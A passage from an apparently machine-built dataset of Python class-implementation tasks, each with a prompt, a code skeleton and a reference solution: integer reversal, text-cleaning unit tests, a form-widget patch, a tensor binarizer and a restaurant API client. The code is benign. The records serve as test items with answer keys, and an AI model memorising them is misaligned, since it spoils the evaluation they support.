else:\n temp2 = temp[1:]\n temp2 = temp2[::-1]\n temp = temp[0] + temp2\n return int(temp) if -2 ** 31 - 1 < int(temp) < 2 ** 31 else 0\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def reverse(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n <|body_0|>\n\n def reverse2(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = 0\n if x < 0:\n symbol = -1\n x = -x\n else:\n symbol = 1\n while x:\n pop = x % 10\n x = x // 10\n res = res * 10 + pop\n return 0 if res > pow(2, 31) else res * symbol\n<|end_body_0|>\n\n<|body_start_1|>\n temp = str(x)\n if temp[0] != '-':\n temp = temp[::-1]\n else:\n temp2 = temp[1:]\n temp2 = temp2[::-1]\n temp = temp[0] + temp2\n return int(temp) if -2 ** 31 - 1 < int(temp) < 2 ** 31 else 0\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000351", "length_bytes": 856, "license_type": "no_license", "methods": [{"docstring": ":type x: int :rtype: int", 
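
An aside on the reverse-integer record above: the stored solution clamps with res > pow(2, 31), which still lets res == 2**31 through for positive inputs. A sketch of the exact signed 32-bit guard, offered for comparison rather than as a change to the stored blob:

    def reverse_checked(x: int) -> int:
        # Digit reversal with the exact 32-bit signed range [-2**31, 2**31 - 1].
        sign = -1 if x < 0 else 1
        res = int(str(abs(x))[::-1]) * sign
        return res if -2**31 <= res <= 2**31 - 1 else 0

    assert reverse_checked(123) == 321
    assert reverse_checked(-120) == -21
    assert reverse_checked(1534236469) == 0  # 9646324351 overflows 32 bits
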
"name": "reverse", "signature": "def reverse(self, x)"}, {"docstring": ":type x: int :rtype: int", "name": "reverse2", "signature": "def reverse2(self, x)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006172", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverse(self, x): :type x: int :rtype: int\n- def reverse2(self, x): :type x: int :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverse(self, x): :type x: int :rtype: int\n- def reverse2(self, x): :type x: int :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def reverse(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n <|body_0|>\n\n def reverse2(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = 0\n if x < 0:\n symbol = -1\n x = -x\n else:\n symbol = 1\n while x:\n pop = x % 10\n x = x // 10\n res = res * 10 + pop\n return 0 if res > pow(2, 31) else res * symbol\n<|end_body_0|>\n\n<|body_start_1|>\n temp = str(x)\n if temp[0] != '-':\n temp = temp[::-1]\n else:\n temp2 = temp[1:]\n temp2 = temp2[::-1]\n temp = temp[0] + temp2\n return int(temp) if -2 ** 31 - 1 < int(temp) < 2 ** 31 else 0\n<|end_body_1|>\n", "revision_id": "1a3c1f4d6e9d3444039f087763b93241f4ba7892", "skeleton": "<|skeleton|>\nclass Solution:\n\n def reverse(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n <|body_0|>\n\n def reverse2(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def reverse(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n res = 0\n if x < 0:\n symbol = -1\n x = -x\n else:\n symbol = 1\n while x:\n pop = x % 10\n x = x // 10\n res = res * 10 + pop\n return 0 if res > pow(2, 31) else res * symbol\n\n def reverse2(self, x):\n \"\"\":type x: int :rtype: int\"\"\"\n temp = str(x)\n if temp[0] != '-':\n temp = temp[::-1]\n else:\n temp2 = temp[1:]\n temp2 = temp2[::-1]\n temp = temp[0] + temp2\n return int(temp) if -2 ** 31 - 1 < int(temp) < 2 ** 31 else 0\n", "source": "the_stack_v2_python_sparse", "source_path": "Algorithm/007_Reverse_Integer.py", "source_repo": "Gi1ia/TechNoteBook", "split": "test", "star_events_count": 7} {"blob_id": "e312b1d5d6279ab5fa4cae313f044f9ed3b4a023", "bodies": ["actual = clean_text('check out this link: https://cyphon.io')\nexpected = 'check out this link'\nself.assertEqual(actual, expected)", "actual = clean_text('@foobar hey there')\nexpected = 'hey there'\nself.assertEqual(actual, expected)", "actual = clean_text('#foobar hey there')\nexpected = 'foobar hey there'\nself.assertEqual(actual, expected)"], "bodies_text": "<|body_start_0|>\n actual = clean_text('check out this link: https://cyphon.io')\n expected = 'check out this link'\n self.assertEqual(actual, expected)\n<|end_body_0|>\n\n<|body_start_1|>\n actual = clean_text('@foobar hey there')\n expected = 'hey there'\n self.assertEqual(actual, expected)\n<|end_body_1|>\n\n<|body_start_2|>\n actual = clean_text('#foobar hey there')\n expected = 'foobar hey there'\n self.assertEqual(actual, expected)\n<|end_body_2|>\n", "class_docstring": "Tests the clean_text() function.", "class_name": "CleanTextTestCase", "detected_licenses": 
["LicenseRef-scancode-proprietary-license", "GPL-3.0-only", "LicenseRef-scancode-unknown-license-reference", "GPL-1.0-or-later", "LicenseRef-scancode-warranty-disclaimer", "LicenseRef-scancode-other-copyleft", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CleanTextTestCase:\n \"\"\"Tests the clean_text() function.\"\"\"\n\n def test_clean_url(self):\n \"\"\"Tests the clean_text() function for text containing a URL.\"\"\"\n <|body_0|>\n\n def test_clean_at(self):\n \"\"\"Tests the clean_text() function for text containing an @ symbol.\"\"\"\n <|body_1|>\n\n def test_clean_hashtag(self):\n \"\"\"Tests the clean_text() function for text containing a hasttag.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n actual = clean_text('check out this link: https://cyphon.io')\n expected = 'check out this link'\n self.assertEqual(actual, expected)\n<|end_body_0|>\n\n<|body_start_1|>\n actual = clean_text('@foobar hey there')\n expected = 'hey there'\n self.assertEqual(actual, expected)\n<|end_body_1|>\n\n<|body_start_2|>\n actual = clean_text('#foobar hey there')\n expected = 'foobar hey there'\n self.assertEqual(actual, expected)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000352", "length_bytes": 4456, "license_type": "permissive", "methods": [{"docstring": "Tests the clean_text() function for text containing a URL.", "name": "test_clean_url", "signature": "def test_clean_url(self)"}, {"docstring": "Tests the clean_text() function for text containing an @ symbol.", "name": "test_clean_at", "signature": "def test_clean_at(self)"}, {"docstring": "Tests the clean_text() function for text containing a hasttag.", "name": "test_clean_hashtag", "signature": "def test_clean_hashtag(self)"}], "n_methods": 3, "prompt": "Implement the Python class `CleanTextTestCase` described below.\n\nClass description:\nTests the clean_text() function.\n\nMethod signatures and docstrings:\n- def test_clean_url(self): Tests the clean_text() function for text containing a URL.\n- def test_clean_at(self): Tests the clean_text() function for text containing an @ symbol.\n- def test_clean_hashtag(self): Tests the clean_text() function for text containing a hasttag.", "prompted_full_text": "Implement the Python class `CleanTextTestCase` described below.\n\nClass description:\nTests the clean_text() function.\n\nMethod signatures and docstrings:\n- def test_clean_url(self): Tests the clean_text() function for text containing a URL.\n- def test_clean_at(self): Tests the clean_text() function for text containing an @ symbol.\n- def test_clean_hashtag(self): Tests the clean_text() function for text containing a hasttag.\n\n<|skeleton|>\nclass CleanTextTestCase:\n \"\"\"Tests the clean_text() function.\"\"\"\n\n def test_clean_url(self):\n \"\"\"Tests the clean_text() function for text containing a URL.\"\"\"\n <|body_0|>\n\n def test_clean_at(self):\n \"\"\"Tests the clean_text() function for text containing an @ symbol.\"\"\"\n <|body_1|>\n\n def test_clean_hashtag(self):\n \"\"\"Tests the clean_text() function for text containing a hasttag.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n actual = clean_text('check out this link: https://cyphon.io')\n expected = 'check out this link'\n self.assertEqual(actual, expected)\n<|end_body_0|>\n\n<|body_start_1|>\n actual = clean_text('@foobar hey there')\n expected = 'hey there'\n self.assertEqual(actual, expected)\n<|end_body_1|>\n\n<|body_start_2|>\n actual = clean_text('#foobar hey there')\n 
expected = 'foobar hey there'\n self.assertEqual(actual, expected)\n<|end_body_2|>\n", "revision_id": "a379a134c0c5af14df4ed2afa066c1626506b754", "skeleton": "<|skeleton|>\nclass CleanTextTestCase:\n \"\"\"Tests the clean_text() function.\"\"\"\n\n def test_clean_url(self):\n \"\"\"Tests the clean_text() function for text containing a URL.\"\"\"\n <|body_0|>\n\n def test_clean_at(self):\n \"\"\"Tests the clean_text() function for text containing an @ symbol.\"\"\"\n <|body_1|>\n\n def test_clean_hashtag(self):\n \"\"\"Tests the clean_text() function for text containing a hasttag.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CleanTextTestCase:\n \"\"\"Tests the clean_text() function.\"\"\"\n\n def test_clean_url(self):\n \"\"\"Tests the clean_text() function for text containing a URL.\"\"\"\n actual = clean_text('check out this link: https://cyphon.io')\n expected = 'check out this link'\n self.assertEqual(actual, expected)\n\n def test_clean_at(self):\n \"\"\"Tests the clean_text() function for text containing an @ symbol.\"\"\"\n actual = clean_text('@foobar hey there')\n expected = 'hey there'\n self.assertEqual(actual, expected)\n\n def test_clean_hashtag(self):\n \"\"\"Tests the clean_text() function for text containing a hasttag.\"\"\"\n actual = clean_text('#foobar hey there')\n expected = 'foobar hey there'\n self.assertEqual(actual, expected)\n", "source": "the_stack_v2_python_sparse", "source_path": "Incident-Response/Tools/cyphon/cyphon/lab/sentiment/test_sentiment.py", "source_repo": "foss2cyber/Incident-Playbook", "split": "test", "star_events_count": 1} {"blob_id": "1f8e3bf4142fbf6429870407b957e1b508fc9a71", "bodies": ["value = self.value.get(name, [])\nif isinstance(value, basestring):\n value = [value]\nreturn SelectPatch.select(value, self.option.get(name, []), False, name, attributes, get_option_attributes, self)", "from bn import HTMLFragment\nfrom formbuild.internal import _select, check_attributes, html_open\nattributes = check_attributes(attributes, ['name', 'multiple'])\nif multiple:\n attributes['multiple'] = 'multiple'\nattributes['name'] = name\nvalues = [unicode(val) for val in value]\nfragment = HTMLFragment()\nfragment.safe(html_open(u'select', False, attributes) + '\\n')\ncounter = 0\nfor v, k in options:\n if get_option_attributes:\n option_attr = get_option_attributes(self, v, k)\n else:\n option_attr = {}\n option_attr = check_attributes(option_attr, ['value', 'selected'])\n if unicode(v) in values:\n option_attr['selected'] = 'selected'\n option_attr['value'] = v\n fragment.safe(html_open(u'option', False, option_attr))\n fragment.write(k)\n fragment.safe('\\n')\nfragment.safe(u'')\nreturn fragment.getvalue()"], "bodies_text": "<|body_start_0|>\n value = self.value.get(name, [])\n if isinstance(value, basestring):\n value = [value]\n return SelectPatch.select(value, self.option.get(name, []), False, name, attributes, get_option_attributes, self)\n<|end_body_0|>\n\n<|body_start_1|>\n from bn import HTMLFragment\n from formbuild.internal import _select, check_attributes, html_open\n attributes = check_attributes(attributes, ['name', 'multiple'])\n if multiple:\n attributes['multiple'] = 'multiple'\n attributes['name'] = name\n values = [unicode(val) for val in value]\n fragment = HTMLFragment()\n fragment.safe(html_open(u'select', False, attributes) + '\\n')\n counter = 0\n for v, k in options:\n if get_option_attributes:\n option_attr = 
get_option_attributes(self, v, k)\n else:\n option_attr = {}\n option_attr = check_attributes(option_attr, ['value', 'selected'])\n if unicode(v) in values:\n option_attr['selected'] = 'selected'\n option_attr['value'] = v\n fragment.safe(html_open(u'option', False, option_attr))\n fragment.write(k)\n fragment.safe('\\n')\n fragment.safe(u'')\n return fragment.getvalue()\n<|end_body_1|>\n", "class_docstring": "", "class_name": "SelectPatch", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SelectPatch:\n\n def dropdown(self, name, attributes=None, get_option_attributes=None):\n \"\"\"Monkey patch for FormBuild 3.0.3 bug\"\"\"\n <|body_0|>\n\n def select(value, options, multiple, name, attributes=None, get_option_attributes=None, self=None):\n \"\"\"This is the same as formbuild.internal._select, with two changes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n value = self.value.get(name, [])\n if isinstance(value, basestring):\n value = [value]\n return SelectPatch.select(value, self.option.get(name, []), False, name, attributes, get_option_attributes, self)\n<|end_body_0|>\n\n<|body_start_1|>\n from bn import HTMLFragment\n from formbuild.internal import _select, check_attributes, html_open\n attributes = check_attributes(attributes, ['name', 'multiple'])\n if multiple:\n attributes['multiple'] = 'multiple'\n attributes['name'] = name\n values = [unicode(val) for val in value]\n fragment = HTMLFragment()\n fragment.safe(html_open(u'select', False, attributes) + '\\n')\n counter = 0\n for v, k in options:\n if get_option_attributes:\n option_attr = get_option_attributes(self, v, k)\n else:\n option_attr = {}\n option_attr = check_attributes(option_attr, ['value', 'selected'])\n if unicode(v) in values:\n option_attr['selected'] = 'selected'\n option_attr['value'] = v\n fragment.safe(html_open(u'option', False, option_attr))\n fragment.write(k)\n fragment.safe('\\n')\n fragment.safe(u'')\n return fragment.getvalue()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000353", "length_bytes": 3090, "license_type": "no_license", "methods": [{"docstring": "Monkey patch for FormBuild 3.0.3 bug", "name": "dropdown", "signature": "def dropdown(self, name, attributes=None, get_option_attributes=None)"}, {"docstring": "This is the same as formbuild.internal._select, with two changes.", "name": "select", "signature": "def select(value, options, multiple, name, attributes=None, get_option_attributes=None, self=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002147", "prompt": "Implement the Python class `SelectPatch` described below.\n\nClass description:\nImplement the SelectPatch class.\n\nMethod signatures and docstrings:\n- def dropdown(self, name, attributes=None, get_option_attributes=None): Monkey patch for FormBuild 3.0.3 bug\n- def select(value, options, multiple, name, attributes=None, get_option_attributes=None, self=None): This is the same as formbuild.internal._select, with two changes.", "prompted_full_text": "Implement the Python class `SelectPatch` described below.\n\nClass description:\nImplement the SelectPatch class.\n\nMethod signatures and docstrings:\n- def dropdown(self, name, attributes=None, get_option_attributes=None): Monkey patch for FormBuild 3.0.3 bug\n- def select(value, options, multiple, name, attributes=None, get_option_attributes=None, self=None): This is the same as formbuild.internal._select, with two changes.\n\n<|skeleton|>\nclass SelectPatch:\n\n 
def dropdown(self, name, attributes=None, get_option_attributes=None):\n \"\"\"Monkey patch for FormBuild 3.0.3 bug\"\"\"\n <|body_0|>\n\n def select(value, options, multiple, name, attributes=None, get_option_attributes=None, self=None):\n \"\"\"This is the same as formbuild.internal._select, with two changes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n value = self.value.get(name, [])\n if isinstance(value, basestring):\n value = [value]\n return SelectPatch.select(value, self.option.get(name, []), False, name, attributes, get_option_attributes, self)\n<|end_body_0|>\n\n<|body_start_1|>\n from bn import HTMLFragment\n from formbuild.internal import _select, check_attributes, html_open\n attributes = check_attributes(attributes, ['name', 'multiple'])\n if multiple:\n attributes['multiple'] = 'multiple'\n attributes['name'] = name\n values = [unicode(val) for val in value]\n fragment = HTMLFragment()\n fragment.safe(html_open(u'select', False, attributes) + '\\n')\n counter = 0\n for v, k in options:\n if get_option_attributes:\n option_attr = get_option_attributes(self, v, k)\n else:\n option_attr = {}\n option_attr = check_attributes(option_attr, ['value', 'selected'])\n if unicode(v) in values:\n option_attr['selected'] = 'selected'\n option_attr['value'] = v\n fragment.safe(html_open(u'option', False, option_attr))\n fragment.write(k)\n fragment.safe('\\n')\n fragment.safe(u'')\n return fragment.getvalue()\n<|end_body_1|>\n", "revision_id": "8a0dd75b196c0e641bb8b4b20124540aaaa2814b", "skeleton": "<|skeleton|>\nclass SelectPatch:\n\n def dropdown(self, name, attributes=None, get_option_attributes=None):\n \"\"\"Monkey patch for FormBuild 3.0.3 bug\"\"\"\n <|body_0|>\n\n def select(value, options, multiple, name, attributes=None, get_option_attributes=None, self=None):\n \"\"\"This is the same as formbuild.internal._select, with two changes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SelectPatch:\n def dropdown(self, name, attributes=None, get_option_attributes=None):\n \"\"\"Monkey patch for FormBuild 3.0.3 bug\"\"\"\n value = self.value.get(name, [])\n if isinstance(value, basestring):\n value = [value]\n return SelectPatch.select(value, self.option.get(name, []), False, name, attributes, get_option_attributes, self)\n\n def select(value, options, multiple, name, attributes=None, get_option_attributes=None, self=None):\n \"\"\"This is the same as formbuild.internal._select, with two changes.\"\"\"\n from bn import HTMLFragment\n from formbuild.internal import _select, check_attributes, html_open\n attributes = check_attributes(attributes, ['name', 'multiple'])\n if multiple:\n attributes['multiple'] = 'multiple'\n attributes['name'] = name\n values = [unicode(val) for val in value]\n fragment = HTMLFragment()\n fragment.safe(html_open(u'select', False, attributes) + '\\n')\n counter = 0\n for v, k in options:\n if get_option_attributes:\n option_attr = get_option_attributes(self, v, k)\n else:\n option_attr = {}\n option_attr = check_attributes(option_attr, ['value', 'selected'])\n if unicode(v) in values:\n option_attr['selected'] = 'selected'\n option_attr['value'] = v\n fragment.safe(html_open(u'option', False, option_attr))\n fragment.write(k)\n fragment.safe('\\n')\n fragment.safe(u'')\n return fragment.getvalue()\n", "source": "the_stack_v2_python_sparse", "source_path": "src/main/resources/qtools/lib/helpers/form.py", "source_repo": 
"v-makarenko/vtoolsmq", "split": "test", "star_events_count": 0} {"blob_id": "99a588fd1b3c8e7defae24d01c4ae7e08c5fb5c1", "bodies": ["super(Binarize, self).__init__()\nself.threshold = threshold\n'Threshold by which to decide the class;\\n low class if ``x<=post_target_thresh``, else high'\nself.val_low_class = val_low_class\n'Value to set the low class to.'\nself.val_high_class = val_high_class\n'Value to set the high class to.'", "settings = dict(threshold=self.threshold)\nif self.val_low_class != 0.0:\n settings['val_low_class'] = self.val_low_class\nif self.val_high_class != 1.0:\n settings['val_high_class'] = self.val_high_class\nreturn settings", "if not isinstance(input_tensor, torch.Tensor):\n raise ValueError('input_tensor must be of type torch.Tensor, but was {}'.format(type(input_tensor)))\nlow_class: torch.tensor = (input_tensor <= self.threshold).float()\nhigh_class: torch.tensor = (input_tensor > self.threshold).float()\nreturn low_class * self.val_low_class + high_class * self.val_high_class"], "bodies_text": "<|body_start_0|>\n super(Binarize, self).__init__()\n self.threshold = threshold\n 'Threshold by which to decide the class;\\n low class if ``x<=post_target_thresh``, else high'\n self.val_low_class = val_low_class\n 'Value to set the low class to.'\n self.val_high_class = val_high_class\n 'Value to set the high class to.'\n<|end_body_0|>\n\n<|body_start_1|>\n settings = dict(threshold=self.threshold)\n if self.val_low_class != 0.0:\n settings['val_low_class'] = self.val_low_class\n if self.val_high_class != 1.0:\n settings['val_high_class'] = self.val_high_class\n return settings\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(input_tensor, torch.Tensor):\n raise ValueError('input_tensor must be of type torch.Tensor, but was {}'.format(type(input_tensor)))\n low_class: torch.tensor = (input_tensor <= self.threshold).float()\n high_class: torch.tensor = (input_tensor > self.threshold).float()\n return low_class * self.val_low_class + high_class * self.val_high_class\n<|end_body_2|>\n", "class_docstring": "Simple class for binarizing tensors into high and low class values. The operation is: .. code-block: python x = val_low_class if x <= post_target_thresh else val_high_class .. note:: :py:attr:`val_low_class` needs *not* to be lower than :py:attr:`val_high_class`, so one can also invert binary masks with this.", "class_name": "Binarize", "detected_licenses": ["MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Binarize:\n \"\"\"Simple class for binarizing tensors into high and low class values. The operation is: .. code-block: python x = val_low_class if x <= post_target_thresh else val_high_class .. note:: :py:attr:`val_low_class` needs *not* to be lower than :py:attr:`val_high_class`, so one can also invert binary masks with this.\"\"\"\n\n def __init__(self, threshold: float=0.5, val_low_class: float=0.0, val_high_class: float=1.0):\n \"\"\"Init. 
:param threshold: the threshold that defines the border between low and high class :param val_high_class: the value to which to set entries from high class :param val_low_class: the value to which to set entries from low class\"\"\"\n <|body_0|>\n\n def settings(self) -> Dict[str, Any]:\n \"\"\"Settings to reproduce instance.\"\"\"\n <|body_1|>\n\n def __call__(self, input_tensor: torch.Tensor) -> torch.Tensor:\n \"\"\"Binarize ``input_tensor`` according to the settings.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Binarize, self).__init__()\n self.threshold = threshold\n 'Threshold by which to decide the class;\\n low class if ``x<=post_target_thresh``, else high'\n self.val_low_class = val_low_class\n 'Value to set the low class to.'\n self.val_high_class = val_high_class\n 'Value to set the high class to.'\n<|end_body_0|>\n\n<|body_start_1|>\n settings = dict(threshold=self.threshold)\n if self.val_low_class != 0.0:\n settings['val_low_class'] = self.val_low_class\n if self.val_high_class != 1.0:\n settings['val_high_class'] = self.val_high_class\n return settings\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(input_tensor, torch.Tensor):\n raise ValueError('input_tensor must be of type torch.Tensor, but was {}'.format(type(input_tensor)))\n low_class: torch.tensor = (input_tensor <= self.threshold).float()\n high_class: torch.tensor = (input_tensor > self.threshold).float()\n return low_class * self.val_low_class + high_class * self.val_high_class\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000354", "length_bytes": 14707, "license_type": "permissive", "methods": [{"docstring": "Init. :param threshold: the threshold that defines the border between low and high class :param val_high_class: the value to which to set entries from high class :param val_low_class: the value to which to set entries from low class", "name": "__init__", "signature": "def __init__(self, threshold: float=0.5, val_low_class: float=0.0, val_high_class: float=1.0)"}, {"docstring": "Settings to reproduce instance.", "name": "settings", "signature": "def settings(self) -> Dict[str, Any]"}, {"docstring": "Binarize ``input_tensor`` according to the settings.", "name": "__call__", "signature": "def __call__(self, input_tensor: torch.Tensor) -> torch.Tensor"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005517", "prompt": "Implement the Python class `Binarize` described below.\n\nClass description:\nSimple class for binarizing tensors into high and low class values. The operation is: .. code-block: python x = val_low_class if x <= post_target_thresh else val_high_class .. note:: :py:attr:`val_low_class` needs *not* to be lower than :py:attr:`val_high_class`, so one can also invert binary masks with this.\n\nMethod signatures and docstrings:\n- def __init__(self, threshold: float=0.5, val_low_class: float=0.0, val_high_class: float=1.0): Init. :param threshold: the threshold that defines the border between low and high class :param val_high_class: the value to which to set entries from high class :param val_low_class: the value to which to set entries from low class\n- def settings(self) -> Dict[str, Any]: Settings to reproduce instance.\n- def __call__(self, input_tensor: torch.Tensor) -> torch.Tensor: Binarize ``input_tensor`` according to the settings.", "prompted_full_text": "Implement the Python class `Binarize` described below.\n\nClass description:\nSimple class for binarizing tensors into high and low class values. The operation is: .. 
code-block: python x = val_low_class if x <= post_target_thresh else val_high_class .. note:: :py:attr:`val_low_class` needs *not* to be lower than :py:attr:`val_high_class`, so one can also invert binary masks with this.\n\nMethod signatures and docstrings:\n- def __init__(self, threshold: float=0.5, val_low_class: float=0.0, val_high_class: float=1.0): Init. :param threshold: the threshold that defines the border between low and high class :param val_high_class: the value to which to set entries from high class :param val_low_class: the value to which to set entries from low class\n- def settings(self) -> Dict[str, Any]: Settings to reproduce instance.\n- def __call__(self, input_tensor: torch.Tensor) -> torch.Tensor: Binarize ``input_tensor`` according to the settings.\n\n<|skeleton|>\nclass Binarize:\n \"\"\"Simple class for binarizing tensors into high and low class values. The operation is: .. code-block: python x = val_low_class if x <= post_target_thresh else val_high_class .. note:: :py:attr:`val_low_class` needs *not* to be lower than :py:attr:`val_high_class`, so one can also invert binary masks with this.\"\"\"\n\n def __init__(self, threshold: float=0.5, val_low_class: float=0.0, val_high_class: float=1.0):\n \"\"\"Init. :param threshold: the threshold that defines the border between low and high class :param val_high_class: the value to which to set entries from high class :param val_low_class: the value to which to set entries from low class\"\"\"\n <|body_0|>\n\n def settings(self) -> Dict[str, Any]:\n \"\"\"Settings to reproduce instance.\"\"\"\n <|body_1|>\n\n def __call__(self, input_tensor: torch.Tensor) -> torch.Tensor:\n \"\"\"Binarize ``input_tensor`` according to the settings.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Binarize, self).__init__()\n self.threshold = threshold\n 'Threshold by which to decide the class;\\n low class if ``x<=post_target_thresh``, else high'\n self.val_low_class = val_low_class\n 'Value to set the low class to.'\n self.val_high_class = val_high_class\n 'Value to set the high class to.'\n<|end_body_0|>\n\n<|body_start_1|>\n settings = dict(threshold=self.threshold)\n if self.val_low_class != 0.0:\n settings['val_low_class'] = self.val_low_class\n if self.val_high_class != 1.0:\n settings['val_high_class'] = self.val_high_class\n return settings\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(input_tensor, torch.Tensor):\n raise ValueError('input_tensor must be of type torch.Tensor, but was {}'.format(type(input_tensor)))\n low_class: torch.tensor = (input_tensor <= self.threshold).float()\n high_class: torch.tensor = (input_tensor > self.threshold).float()\n return low_class * self.val_low_class + high_class * self.val_high_class\n<|end_body_2|>\n", "revision_id": "37b9fc83d7b14902dfe92e0c45071c150bcf3779", "skeleton": "<|skeleton|>\nclass Binarize:\n \"\"\"Simple class for binarizing tensors into high and low class values. The operation is: .. code-block: python x = val_low_class if x <= post_target_thresh else val_high_class .. note:: :py:attr:`val_low_class` needs *not* to be lower than :py:attr:`val_high_class`, so one can also invert binary masks with this.\"\"\"\n\n def __init__(self, threshold: float=0.5, val_low_class: float=0.0, val_high_class: float=1.0):\n \"\"\"Init. 
:param threshold: the threshold that defines the border between low and high class :param val_high_class: the value to which to set entries from high class :param val_low_class: the value to which to set entries from low class\"\"\"\n <|body_0|>\n\n def settings(self) -> Dict[str, Any]:\n \"\"\"Settings to reproduce instance.\"\"\"\n <|body_1|>\n\n def __call__(self, input_tensor: torch.Tensor) -> torch.Tensor:\n \"\"\"Binarize ``input_tensor`` according to the settings.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Binarize:\n \"\"\"Simple class for binarizing tensors into high and low class values. The operation is: .. code-block: python x = val_low_class if x <= post_target_thresh else val_high_class .. note:: :py:attr:`val_low_class` needs *not* to be lower than :py:attr:`val_high_class`, so one can also invert binary masks with this.\"\"\"\n\n def __init__(self, threshold: float=0.5, val_low_class: float=0.0, val_high_class: float=1.0):\n \"\"\"Init. :param threshold: the threshold that defines the border between low and high class :param val_high_class: the value to which to set entries from high class :param val_low_class: the value to which to set entries from low class\"\"\"\n super(Binarize, self).__init__()\n self.threshold = threshold\n 'Threshold by which to decide the class;\\n low class if ``x<=post_target_thresh``, else high'\n self.val_low_class = val_low_class\n 'Value to set the low class to.'\n self.val_high_class = val_high_class\n 'Value to set the high class to.'\n\n def settings(self) -> Dict[str, Any]:\n \"\"\"Settings to reproduce instance.\"\"\"\n settings = dict(threshold=self.threshold)\n if self.val_low_class != 0.0:\n settings['val_low_class'] = self.val_low_class\n if self.val_high_class != 1.0:\n settings['val_high_class'] = self.val_high_class\n return settings\n\n def __call__(self, input_tensor: torch.Tensor) -> torch.Tensor:\n \"\"\"Binarize ``input_tensor`` according to the settings.\"\"\"\n if not isinstance(input_tensor, torch.Tensor):\n raise ValueError('input_tensor must be of type torch.Tensor, but was {}'.format(type(input_tensor)))\n low_class: torch.tensor = (input_tensor <= self.threshold).float()\n high_class: torch.tensor = (input_tensor > self.threshold).float()\n return low_class * self.val_low_class + high_class * self.val_high_class\n", "source": "the_stack_v2_python_sparse", "source_path": "hybrid_learning/datasets/transforms/image_transforms.py", "source_repo": "JohnnyZhang917/hybrid_learning", "split": "test", "star_events_count": 0} {"blob_id": "43ad4d1e8c2b29aa8fc1db4f7f1add73fcbd0b9e", "bodies": ["catalog = RestaurantCatalog()\ntry:\n res = requests.get(self.ENDPOINT, timeout=4)\n if res.status_code == 200:\n catalog.add_many([Restaurant.from_json(row) for row in res.json()])\nexcept ConnectionError:\n print('Failed to connect to API')\nreturn catalog", "if len(data) == 0:\n return\nput_data = {'timestamp': token, 'data': data}\nres = requests.post(self.ENDPOINT, json=put_data)\nif res.status_code != 200:\n print('Failed to send insert data to database, writing to file instead')\n FileOutputter().insert(data, token)", "if len(data) == 0:\n return\npost_data = {'timestamp': token, 'data': data}\nres = requests.put(self.ENDPOINT, json=post_data)\nif res.status_code != 200:\n print('Failed to send update data to database, writing to file instead')\n FileOutputter().update(data, token)", "if len(data) == 0:\n 
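Editor's note on the `Binarize` record that ends above: the thresholding arithmetic is small enough to sanity-check standalone. The sketch below reimplements the `__call__` logic as a free function purely for illustration; the function name and test values are mine, not part of the record.

```python
# Illustrative sketch of the Binarize.__call__ arithmetic from the record above:
# entries <= threshold map to val_low, the rest to val_high. Names/values assumed.
import torch

def binarize(t: torch.Tensor, threshold: float = 0.5,
             val_low: float = 0.0, val_high: float = 1.0) -> torch.Tensor:
    low = (t <= threshold).float()
    high = (t > threshold).float()
    return low * val_low + high * val_high

x = torch.tensor([0.1, 0.5, 0.9])
assert torch.equal(binarize(x), torch.tensor([0.0, 0.0, 1.0]))
# Swapping the class values inverts the mask, as the class docstring points out.
assert torch.equal(binarize(x, val_low=1.0, val_high=0.0),
                   torch.tensor([1.0, 1.0, 0.0]))
```

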